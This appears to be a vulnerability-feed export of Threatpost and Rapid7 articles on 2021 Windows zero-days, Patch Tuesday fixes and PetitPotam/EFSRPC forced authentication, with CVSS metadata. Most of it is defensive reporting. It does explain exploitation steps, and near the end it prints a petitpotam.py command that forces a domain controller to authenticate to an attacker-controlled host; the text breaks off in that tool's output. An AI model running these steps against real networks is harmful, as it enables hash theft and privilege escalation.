attackers.\n\n\u201cAs [HiveNightmare/SeriousSAM](<https://threatpost.com/win-10-serioussam/168034/>) has taught us, an arbitrary file disclosure can be upgraded to local privilege escalation if you know which files to take and what to do with them,\u201d Mitja Kolsek, head of the 0patch team, noted in a [recent posting](<https://blog.0patch.com/2021/11/micropatching-unpatched-local-privilege.html>). \u201cWe confirmed this [for the zero-day and were] able to run code as local administrator.\u201d\n\n> It's still hilarious that this bug is still unpatched and fully functional on a windows 10 21H1 with october patch. <https://t.co/HO4Kwbql9z>\n> \n> \u2014 Abdelhamid Naceri (@KLINIX5) [November 2, 2021](<https://twitter.com/KLINIX5/status/1455500874596356098?ref_src=twsrc%5Etfw>)\n\n## **Windows 10 Bug Exploitation Details**\n\nSpecifically, the vulnerable functionality exists under the \u201caccess work or school\u201d settings, according to the opatch writeup. A normal user can make use of the \u201cexport your management log files\u201d function, which triggers the Device Management Enrollment Service.\n\n\u201cThis service first copies some log files to the C:\\ProgramData\\Microsoft\\MDMDiagnostics folder, and then packages them into a .CAB file whereby they\u2019re temporarily copied to C:\\Windows\\Temp folder,\u201d explained Kolsek. \u201cThe resulting .CAB file is then stored in the C:\\Users\\Public\\Public Documents\\MDMDiagnostics folder, where the user can freely access it.\u201d\n\nHowever, when the .CAB file is copied into the Windows Temp folder, a local attacker can pounce. The adversary would simply create a file shortcut link with a predictable file name that would normally be used in the normal export process, pointing to a target folder or file that the attacker would like to access.\n\n\u201cSince the Device Management Enrollment Service runs as Local System, it can read any system file that the attacker can\u2019t,\u201d Kolsek said.\n\nThere are two pre-requisites for achieving LPE, Kolsek noted.\n\n\u201cSystem protection must be enabled on drive C, and at least one restore point created. Whether system protection is enabled or disabled by default depends on various parameters,\u201d he said. And, \u201cat least one local administrator account must be enabled on the computer, or at least one \u2018administrators\u2019 group member\u2019s credentials cached.\u201d\n\nTo address the issue, the free micropatch simply checks for the presence of short-cut links during the .CAB file creation.\n\n\u201cThe function we patched is CollectFileEntry inside mdmdiagnostics.dll. This is the function that copies files from C:\\Windows\\Temp folder into the .CAB file, and can be tricked into reading some other files instead,\u201d Kolsek explained. \u201cOur patch is placed immediately before the call to CopyFileW that opens the source file for copying, and uses the GetFinalPathNameByHandleW function to determine whether any junctions or other types of links are used in the path. If they are, our patch makes it look as it the CopyFileW call has failed, thereby silently bypassing the copying of any file that doesn\u2019t actually reside in C:\\Windows\\Temp.\u201d\n\nVulnerable versions of Windows include:\n\n * Windows 10 v21H1 (32 &amp; 64 bit) updated with November 2021 Updates\n * Windows 10 v20H2 (32 &amp; 64 bit) updated with November 2021 Updates\n * Windows 10 v2004 (32 &amp; 64 bit) updated with November 2021 Updates\n * Windows 10 v1909 (32 &amp; 64 bit) updated with November 2021 Updates\n * Windows 10 v1903 (32 &amp; 64 bit) updated with November 2021 Updates\n * Windows 10 v1809 (32 &amp; 64 bit) updated with May 2021 Updates\n\nWindows Servers are not affected, and neither are Windows 11, Windows 10 v1803 and older Windows 10 versions.\n\nMicrosoft did not immediately return a request for comment on the timeline for an official patch.\n\n**_There\u2019s a sea of unstructured data on the internet relating to the latest security threats. _****_[REGISTER TODAY](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_****_ to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). This [LIVE, interactive Threatpost Town Hall](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>), sponsored by Rapid 7, will feature security researchers Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus Threatpost journalist and webinar host, Becky Bracken._**\n\n[**_Register NOW_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_** for the LIVE event!**_\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-29T17:47:10", "type": "threatpost", "title": "Unpatched Windows 10 Zero-Day Allows Privileged File Access", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24084", "CVE-2021-36934"], "modified": "2021-11-29T17:47:10", "id": "THREATPOST:C8E47BBF9477DAA48006FB947AF7F4C7", "href": "https://threatpost.com/unpatched-windows-zero-day-privileged-file-access/176609/", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2021-12-15T14:21:48", "description": "Microsoft has addressed a zero-day vulnerability that was exploited in the wild to deliver Emotet, Trickbot and more in the form of fake applications.\n\nThe patch came as part of the computing giant\u2019s December Patch Tuesday update, which included a total of 67 fixes for security vulnerabilities. The patches cover the waterfront of Microsoft\u2019s portfolio, affecting ASP.NET Core and Visual Studio, Azure Bot Framework SDK, Internet Storage Name Service, Defender for IoT, Edge (Chromium-based), Microsoft Office and Office Components, SharePoint Server, PowerShell, Remote Desktop Client, Windows Hyper-V, Windows Mobile Device Management, Windows Remote Access Connection Manager, TCP/IP, and the Windows Update Stack.\n\nSeven of the bugs addressed are rated critical, six were previously disclosed as zero-days and 60 are considered \u201cimportant.\u201d\n\nThe update brings the total number of CVEs patched by Microsoft this year to 887, which is down 29 percent in volume from a very busy 2020.\n\n## **Zero-Day Exploited in Wild**\n\nThe zero-day ([CVE-2021-43890](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43890>)) is an important-rated spoofing vulnerability in the Windows AppX Installer, which is a utility for side-loading Windows 10 apps, available on the App Store.\n\nKevin Breen, director of cyber-threat research at Immersive Labs, explained that the bug \u201callows an attacker to create a malicious package file and then modify it to look like a legitimate application, and has been used to deliver Emotet malware, which [made a comeback](<https://threatpost.com/emotet-resurfaces-trickbot/176362/>) this year.\u201d\n\nBreen warned, \u201cthe patch should mean that packages can no longer be spoofed to appear as valid, but it will not stop attackers from sending links or attachments to these files.\u201d\n\nPrior to its fix today, the bug was seen in multiple attacks associated with Emotet, TrickBot and Bazaloader, according to Satnam Narang, staff research engineer at Tenable.\n\n\u201cTo exploit this vulnerability, an attacker would need to convince a user to open a malicious attachment, which would be conducted through a phishing attack,\u201d he explained via email. \u201cOnce exploited, the vulnerability would grant an attacker elevated privileges, particularly when the victim\u2019s account has administrative privileges on the system.\u201d\n\nIf patching isn\u2019t an option, Microsoft has provided some workarounds to protect against the exploitation of this vulnerability.\n\n## **Other Publicly Known Microsoft Vulnerabilities**\n\nIt\u2019s worth noting that Microsoft also patched [CVE-2021-43883](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43883>), a privilege-escalation vulnerability in Windows Installer, for which [there\u2019s been an exploit circulating](<https://threatpost.com/attackers-target-windows-installer-bug/176558/>), and, reportedly, active targeting by attackers \u2013 even though Microsoft said it has seen no exploitation.\n\n\u201cThis appears to be a fix for a patch bypass of [CVE-2021-41379](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41379>), another elevation-of-privilege vulnerability in Windows Installer that was reportedly fixed in November,\u201d Narang said. \u201cHowever, researchers discovered that fix was incomplete, and a proof-of-concept was made public late last month.\u201d\n\nBreen noted that this kind of vulnerability is highly sought after by attackers looking to move laterally across a network.\n\n\u201cAfter gaining the initial foothold, achieving administrator-level access can allow attackers to disable security tools and deploy additional malware or tools like Mimikatz,\u201d he said. \u201cAlmost all ransomware attacks in the last year employed some form of privilege escalation as a key component of the attack prior to launching ransomware.\u201d\n\nFour other bugs were listed as \u201cpublicly known\u201d but not exploited, all rated important and allowing privilege escalation:\n\n * [CVE-2021-43240](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43240>), a NTFS Set Short Name\n * [CVE-2021-43893](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43893>), a Windows Encrypting File System (EFS)\n * [CVE-2021-43880](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43880>), Windows Mobile Device Management\n * [CVE-2021-41333](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41333>), Windows Print Spooler\n\nThe update does not address CVE-2021-24084, an unpatched Windows security vulnerability [disclosed in late November](<https://threatpost.com/unpatched-windows-zero-day-privileged-file-access/176609/>), which could allow information disclosure and local privilege escalation (LPE).\n\n## **Critical-Rated Microsoft Security Bugs for December**\n\n 1. ### **CVE-2021-43215 in iSNS Server**\n\nThe first critical bug ([CVE-2021-43215](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43215>)) to cover allows remote code-execution (RCE) on the Internet Storage Name Service (iSNS) server, which enables automated discovery and management of iSCSI devices on a TCP/IP storage network. It rates 9.8 out of 10 on the vulnerability-severity scale.\n\nThe bug can be exploited if an attacker sends a specially crafted request to an affected server, according to Microsoft\u2019s advisory.\n\n\u201cIn other words, if you\u2019re running a storage-area network (SAN) in your enterprise, you either have an iSNS server or you configure each of the logical interfaces individually,\u201d said Trend Micro Zero Day Initiative researcher Dustin Childs, in a [Tuesday blog](<https://www.zerodayinitiative.com/blog/2021/12/14/the-december-2021-security-update-review>). \u201cIf you have a SAN, prioritize testing and deploying this patch.\u201d\n\nBreen concurred that it\u2019s critical to patch quickly if an organization operates iSNS services.\n\n\u201cRemember that this is not a default component, so check this before you bump it up the list,\u201d he said via email. However, \u201cas this protocol is used to facilitate data storage over the network, it would be a high priority target for attackers looking to damage an organization\u2019s ability to recover from attacks like ransomware. These services are also typically trusted from a network perspective \u2013 which is another reason attackers would choose this kind of target.\u201d\n\n 2. ### **CVE-2021-43907 in Visual Studio Code WSL Extension**\n\nAnother 9.8-out-of-10-rated bug is [CVE-2021-43907](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43907>), an RCE issue in Visual Studio Code WSL Extension that Microsoft said can be exploited by an unauthenticated attacker, with no user interaction. It didn\u2019t provide further details.\n\n\u201cThis impacted component lets users use the Windows Subsystem for Linux (WSL) as a full-time development environment from Visual Studio Code,\u201d Childs explained. \u201cIt allows you to develop in a Linux-based environment, use Linux-specific tool chains and utilities, and run and debug Linux-based applications all from within Windows. This sort of cross-platform functionality is used by many in the DevOps community.\u201d\n\n 3. ### **CVE-2021-43899 \u2013 Microsoft 4K Wireless Display Adapter **\n\nThe third and final 9.8 CVSS-rate bug is [CVE-2021-43899](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43899>), which also allows RCE on an affected device, if the attacker has a foothold on the same network as the Microsoft 4K Display Adapter. Exploitation is a matter of sending specially crafted packets to the affected device, according to Microsoft.\n\n\u201cPatching this won\u2019t be an easy chore,\u201d Childs said. \u201cTo be protected, users need to install the Microsoft Wireless Display Adapter application from the Microsoft Store onto a system connected to the Microsoft 4K Wireless Display Adapter. Only then can [they] use the \u2018Update &amp; Security\u2019 section of the app to download the latest firmware to mitigate this bug.\u201d\n\n 4. ### **CVE-2021-43905 in Microsoft Office**\n\nAnother critical RCE bug ([CVE-2021-43905](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43905>)) exists in the Microsoft Office app; it rates 9.6 on the CVSS vulnerability-severity scale, and Microsoft marked it as \u201cexploitation more likely.\u201d\n\n\u201cVery little is given away in the advisory to identify what the immediate risk is \u2013 it simply states the affected product as \u2018Office App,'\u201d Breen noted. \u201cThis can make it difficult for security teams to prioritize or put mitigations in place if quick patching is not available \u2013 especially when security teams are already tied down with other critical patching.\u201d\n\nHowever, Aleks Haugom, researcher at Automox, said it should be a priority for patching.\n\n\u201cAs a low-complexity vulnerability, an attacker can expect repeated results,\u201d he said in a [Tuesday analysis](<https://blog.automox.com/automox-experts-weigh-in-on-december-2021-patch-tuesday-release>). \u201cAlthough Microsoft has not disclosed exactly what user interaction is required for the attacker to succeed they have confirmed that the Preview Pane is not an attacker vector. Given that this threat can impact resources beyond the security scope managed by the security authority immediate remediation actions are advised.\u201d\n\n 5. ### **CVE-2021-42310** **in Microsoft Defender for IoT**\n\nOne of 10 issues found in Defender for IoT, this bug ([CVE-2021-42310](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42310>)) allows RCE and rates 8.1 on the CVSS scale.\n\n\u201cA password reset request consists of a signed JSON document, a signing certificate, and an intermediate certificate that was used to sign the signing certificate,\u201d explained Childs. \u201cThe intermediate certificate is supposed to chain up to a root CA certificate built into the appliance. Due to a flaw in this process, an attacker can reset someone else\u2019s password. Patching these bugs requires a sysadmin to [take action](<https://docs.microsoft.com/en-us/azure/defender-for-iot/organizations/how-to-manage-the-on-premises-management-console#update-the-software-version>) on the device itself.\u201d\n\nThe other nine bugs in the platform include seven other RCE vulnerabilities, one elevation of privilege vulnerability and one data disclosure vulnerability, all rated \u201cimportant.\u201d\n\n 6. ### **CVE-2021-43217 in the Windows Encrypting File System (EFS) **\n\nThis bug ([CVE-2021-43217](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43217>)) allows RCE and rates 8.1 on the CVSS scale.\n\n\u201cAn attacker could cause a buffer overflow that would leading to unauthenticated non-sandboxed code execution, even if the EFS service isn\u2019t running at the time,\u201d Childs explained. \u201cEFS interfaces can trigger a start of the EFS service if it is not running.\u201d\n\nJay Goodman, in the Automox posting, noted that it can be chained with the publicly disclosed elevation of privilege vulnerability in EFS and thus presents a special threat.\n\n\u201cWhile either of these vulnerabilities constitute impactful disclosures that need to be handled quickly, the combination of the two in a near universal service critical to securing and protecting data creates a unique situation,\u201d he said. \u201cAttacks could use the combination of RCE with privilege elevation to quickly deploy, elevate and execute code on a target system with full system rights. This can allow attackers to easily take full control of the system as well as create a base of operations within the network to spread laterally.\u201d\n\nIn other words: This is a critical pair of vulnerabilities to address as soon as possible to minimize organizational risk.\n\n 7. ### **CVE-2021-43233 in Remote Desktop Client **\n\nThe flaw ([CVE-2021-43233](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43233>)) allows RCE and rates 7 on the CVSS scale. It\u2019s listed as \u201cexploitation more likely.\u201d\n\n\u201cThis one\u2026would likely require a social engineering or phishing component to be successful,\u201d Breen explained. \u201cA similar vulnerability, [CVE-2021-38666](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38666>), was reported and patched in November. While it was also marked as \u2018exploitation more likely,\u2019 thankfully there have been no reports of proof-of-concept code or of it being exploited in the wild, which goes to show how important it is to make your own risk-based approach to prioritizing patches.\u201d\n\nAutomox researcher Gina Geisel emphasized the bug\u2019s high complexity for exploitation.\n\n\u201cTo exploit this vulnerability, an attacker requires control of a server and then must convince users to connect to it, through social engineering, DNS poisoning or using a man-in-the-middle (MITM) technique, as examples,\u201d she said. \u201cAn attacker could also compromise a legitimate server, host malicious code on it, and wait for the user to connect.\u201d\n\n## **Other Microsoft Bugs of Note for December**\n\nChilds also flagged [CVE-2021-42309](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42309>), an RCE issue in Microsoft SharePoint Server, as a vulnerability to prioritize. It allows an attacker to bypass the restriction against running arbitrary server-side web controls.\n\n\u201cThe vulnerability allows a user to elevate and execute code in the context of the service account,\u201d he explained. \u201cAn attacker would need \u2018Manage Lists\u2019 permissions on a SharePoint site, but by default, any authorized user can create their own new site where they have full permissions.\u201d\n\nHe said the issue is similar to the previously patched [CVE-2021-28474](<https://www.zerodayinitiative.com/blog/2021/7/7/cve-2021-28474-sharepoint-remote-code-execution-via-server-side-control-interpretation-conflict>), except that the unsafe control \u201cis \u2018smuggled\u2019 in a property of an allowed control.\u201d\n\nOperating system bugs should be prioritized, researchers added.\n\n\u201cThe disclosures include a functional example in the case of the Print Spooler, proof-of-concept for the NTFS and Windows Installer vulnerabilities, so there is some cause to put urgency on the OS updates this month,\u201d Chris Goettl, vice president of product management at Ivanti, told Threatpost.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-12-14T22:21:35", "type": "threatpost", "title": "Actively Exploited Microsoft Zero-Day Allows App Spoofing, Malware Delivery", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24084", "CVE-2021-28474", "CVE-2021-38666", "CVE-2021-41333", "CVE-2021-41379", "CVE-2021-42309", "CVE-2021-42310", "CVE-2021-43215", "CVE-2021-43217", "CVE-2021-43233", "CVE-2021-43240", "CVE-2021-43880", "CVE-2021-43883", "CVE-2021-43890", "CVE-2021-43893", "CVE-2021-43899", "CVE-2021-43905", "CVE-2021-43907"], "modified": "2021-12-14T22:21:35", "id": "THREATPOST:DD8030D774C6B1FBB3DEDAFC836B8B80", "href": "https://threatpost.com/exploited-microsoft-zero-day-spoofing-malware/177045/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "rapid7blog": [{"lastseen": "2021-12-03T21:03:37", "description": "CVE | Vendor Advisory | AttackerKB | IVM Content | Patching Urgency | Last Update \n---|---|---|---|---|--- \nCVE-2021-41379 | [Microsoft Advisory](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41379>) | [AttackerKB](<https://attackerkb.com/topics/7LstI2clmF/cve-2021-41379/rapid7-analysis?referrer=blog>) | Scheduled (when patched) | ASAP (when released) | December 3, 2021 3:00 PM ET \n\n\n_See the Updates section at the end of this post for new information._\n\n## Description\n\nOn November 9, 2021, as part of Patch Tuesday, Microsoft released an update to address [CVE-2021-41379](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41379>), a \u201cWindows Installer Elevation of Privilege Vulnerability\u201d that had a modest CVSS score (5.5), without much fanfare. The original CVE allows an attacker to delete files on a system using elevated privileges.\n\nFast-forward to November 22, 2021, when after investigating the patch, the researcher that discovered the vulnerability, Abdelhamid Naceri, found that it did not fully remediate the issue and published proof-of-concept (PoC) code on [GitHub](<https://github.com/klinix5/InstallerFileTakeOver>) proving exploitation of the vulnerability is still possible on patched versions of Windows allowing for SYSTEM-level privileges. The working PoC \u201coverwrites Microsoft Edge elevation service 'DACL' and copies itself to the service location, then executes it to gain elevated privileges.\u201d\n\nWith a zero-day exploit available, attackers have been chipping away at ways to utilize the vulnerability, especially in [malware](<https://blog.talosintelligence.com/2021/11/attackers-exploiting-zero-day.html>).\n\nAs of November 30, 2021, there is not an official patch from Microsoft to fully and effectively remediate this vulnerability. Community researchers and security practitioners have noted that other Microsoft zero-day vulnerabilities this year, such as [CVE-2021-36934](<https://www.rapid7.com/blog/post/2021/07/21/microsoft-sam-file-readability-cve-2021-36934-what-you-need-to-know/>) (\u201cHiveNightmare\u201d/\u201dSeriousSAM\u201d), were not fixed until typical Patch Tuesday release cycles even if public exploit code had already made an appearance. We expect that this vulnerability will follow that same pattern and that we won\u2019t see a new patch (and/or a new CVE, if Microsoft does indeed classify this as a patch bypass) until December 2021\u2019s Patch Tuesday.\n\n## Affected versions\n\nAccording to the researcher, all supported versions of Windows, including Windows 11 and Server 2022, are vulnerable to the exploit.\n\n## Guidance\n\nWith no official patch at this time, we recommend that organizations prepare to patch this as soon as the official fix is released. Meanwhile, Rapid7 researchers have confirmed that [a number of antimalware programs](<https://www.virustotal.com/gui/file/a43bafb2af2a1adcd1371ab3810b2908b591bc32798f3ad35ad662cf967b12fd/detection>) have added detection of Naceri's exploit, so as usual, keep those programs up to date. Lastly, organizations can detect previous exploitation of this PoC by monitoring for EventID 1033 and \u201ctest pkg\u201d (keeping in mind that the \u201ctest pkg\u201d will only find this exact PoC and may be modified by more enterprising attackers). \n**(Please see the Updates section regarding the latest on AV detection of this exploit).**\n\n\n\n## Rapid7 customers\n\nFor Rapid7 InsightVM customers, we will be releasing vulnerability checks if and when Microsoft publishes patch information for the new vulnerability.\n\nIn the meantime, InsightVM customers can use [Query Builder](<https://docs.rapid7.com/insightvm/query-builder/>) to find Windows assets by creating the following query: `os.family` `contains` `windows`. Rapid7 Nexpose customers can create a [Dynamic Asset Group](<https://docs.rapid7.com/nexpose/performing-filtered-asset-searches>) based on a filtered asset search for `OS` `contains` `windows`.\n\n## Updates\n\n[December 3, 2021] \nRapid7 has published an in-depth technical analysis on [AttackerKB](<https://attackerkb.com/topics/7LstI2clmF/cve-2021-41379/rapid7-analysis?referrer=blog>) that includes a streamlined, more functional PoC. Also, of note, is our research shows that attackers using this exploit can easily evade detection by AV.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-30T19:03:28", "type": "rapid7blog", "title": "Ongoing Exploitation of Windows Installer CVE-2021-41379", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934", "CVE-2021-41379"], "modified": "2021-11-30T19:03:28", "id": "RAPID7BLOG:E5721E7C94293776737FD29EE61C94E2", "href": "https://blog.rapid7.com/2021/11/30/ongoing-exploitation-of-windows-installer-cve-2021-41379/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-14T17:27:53", "description": "\n\nOn December 14, 2021, during the [Log4Shell](<https://www.rapid7.com/blog/post/2021/12/15/the-everypersons-guide-to-log4shell-cve-2021-44228/>) chaos, Microsoft published [CVE-2021-43893](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43893>), a remote privilege escalation vulnerability affecting the Windows Encrypted File System (EFS). The vulnerability was credited to [James Forshaw](<https://twitter.com/tiraniddo>) of [Google Project Zero](<https://googleprojectzero.blogspot.com/p/about-project-zero.html>), but perhaps owing to the Log4Shell atmosphere, the vulnerability gained little to no attention.\n\nOn January 13, 2022, Forshaw [tweeted](<https://twitter.com/tiraniddo/status/1481633916507209737?s=20&t=P1xWmHiiDap39HipKqbHGg>) about the vulnerability.\n\n\n\nThe tweet suggests that CVE-2021-43893 was only issued a partial fix in the December 2021 update and that authenticated and remote users could still write arbitrary files on domain controllers. James linked to the Project Zero [bug tracker](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2228>), where an extended writeup and some proof-of-concept code was stored.\n\nThis vulnerability was of particular interest to me, because I had recently discovered a local privilege escalation (LPE) using file planting in a Windows product. The vulnerable product could reasonably be deployed on a system with unconstrained delegation, which meant I could use CVE-2021-43893 to remotely plant the file as a low-privileged _remote_ user, turning my LPE into RCE.\n\nI set out to investigate if the remote file-writing aspect of James Forshaw\u2019s bug was truly unpatched. The investigation resulted in a few interesting observations:\n\n * Low-privileged user remote file-writing was patched in the December update. However, before the December update, a remote low-privileged user really could write arbitrary files on system-assigned unconstrained delegation.\n * Forced authentication and relaying are still not completely patched. Relay attacks initiated on the `efsrpc` named pipe have been known since inclusion in [PetitPotam](<https://github.com/topotam/PetitPotam>) in [July 2021](<https://github.com/topotam/PetitPotam/commit/d3a3e0ccbe22432a30509df3551a7766bb89f706>). The issue seems to persist despite multiple patch attempts.\n\nAlthough the file upload aspect of this vulnerability has been patched, I found the vulnerability quite interesting. The vulnerability is certainly limited by the restrictions on where a low-privileged user can create files on a Domain Controller, and maybe that is why the vulnerability didn\u2019t receive more attention. But as I touched upon, it can be paired with a local vulnerability to achieve remote code execution, and as such, I thought it deserved more attention. I also have found the failure to properly patch forced authentication over the [EFSRPC](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31>) protocol to be worthy of more examination.\n\n## Inadequate EFSPRC forced authentication patching: A brief history of PetitPotam\n\nPetitPotam was released in the summer of 2021 and was widely associated with an [attack chain](<https://www.truesec.com/hub/blog/from-stranger-to-da-using-petitpotam-to-ntlm-relay-to-active-directory>) that starts as an unauthenticated and remote attacker and ends with domain administrator privileges. PetitPotam is **only** the beginning of that chain. It allows an attacker to force a victim Windows computer to authenticate to a third party (e.g. [MITRE ATT&amp;CK T118 - forced authentication](<https://attack.mitre.org/techniques/T1187/>)). The full chain is interesting, but this discussion is only interested in the initial portion triggered by PetitPotam.\n\nPetitPotam triggers forced authentication using the EFSRPC protocol. The original implementation of the exploit performed the attack over the `lsarpc` named pipe. The attack is quite simple. Originally, PetitPotam sent the victim server an [`EfsRpcOpenFileRaw`](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/ccc4fb75-1c86-41d7-bbc4-b278ec13bfb8>) request containing a [UNC file path](<https://docs.microsoft.com/en-us/dotnet/standard/io/file-path-formats>). Using a UNC path such as `\\\\10.0.0.4\\fake_share\\fake_file` forces the victim server to reach out to the third-party server, 10.0.0.4 in this example, in order to read off of the desired file share. The third-party server can then tell the victim to authenticate in order to access the share, and the victim obliges. The result is the victim leaks their Net-NTLM hash. That\u2019s the whole thing. We will later touch on what an attacker can do with this hash, but for this section, that\u2019s all we need to know.\n\nMicrosoft first attempted to patch the EFSRPC forced authentication in August 2021 by blocking the use of `EfsRpcOpenFileRaw` over the `lsarpc` named pipe. To do this, they added logic to `efslsaext.dll`\u2019s `EfsRpcOpenFileRaw_Downllevel` function to check for a value stored in the `HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EFS\\AllowOpenRawDL`. Because this registry key doesn\u2019t exist by default, a typical configuration will always fail this check.\n\n\n\nThat patch was inadequate, because `EfsRpcOpenFileRaw` isn\u2019t the only EFSRPC function that accepts a UNC file path as a parameter. PetitPotam was quickly [updated](<https://github.com/topotam/PetitPotam/commit/ea66c3f141b1ce3f97865518c87a9b53ebecdb7a>) to use `EfsRpcEncryptFileSrv`, and just like that, the patch was bypassed.\n\nThe patch also failed to recognize that the `lsarpc` named pipe wasn\u2019t the only named pipe that EFSRPC can be executed over. The [`efsrpc`](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/403c7ae0-1a3a-4e96-8efc-54e79a2cc451>) named pipe (among others) can also be used. `efsrpc` named pipe is slightly less desirable, since it requires the attacker to be authenticated, but the attack works over that pipe, **and** it doesn\u2019t use the `EfsRpcOpenFileRaw_Downlevel` function. That means an attacker can also bypass the patch by switching named pipes.\n\nAs mentioned earlier, PetitPotam was updated in July 2021 to use the `efsrpc` named pipe. The following output shows PetitPotam forcing a Domain Controller patched through November 2021 to authenticate with an attacker controlled box running Responder.py (10.0.0.6) (I\u2019ve left out the Responder bit since this is just meant to highlight the EFSRPC was available and unpatched for months).\n \n \n albinolobster@ubuntu:~/impacket/examples$ python3 petitpotam.py -pipe efsr -u 'lowlevel' -p \u2018cheesed00dle!' -d okhuman.ninja 10.0.0.6 10.0.0.5 \n \n \n ___ _ _ _ ___ _ \n | _ \\ ___ | |_ (_) | |_ | _ \\ ___ | |_ __ _ _ __ \n | _/ / -_) | _| | | | _| | _/ / _ \\ | _| / _` | | ' \\ \n _|_|_ \\___| _\\__| _|_|_ _\\__| _|_|_ \\___/ _\\__| \\__,_| |_|_|_| \n _| \"\"\" |_|\"\"\"\"\"|_|\"\"\"\"\"|_|\"\"\"\"\"|_|\"\"\"\"\"|_| \"\"\" |_|\"\"\"\"\"|_|\"\"\"\"\"|_|\"\"\"\"\"|_|\"\"\"\"\"| \n 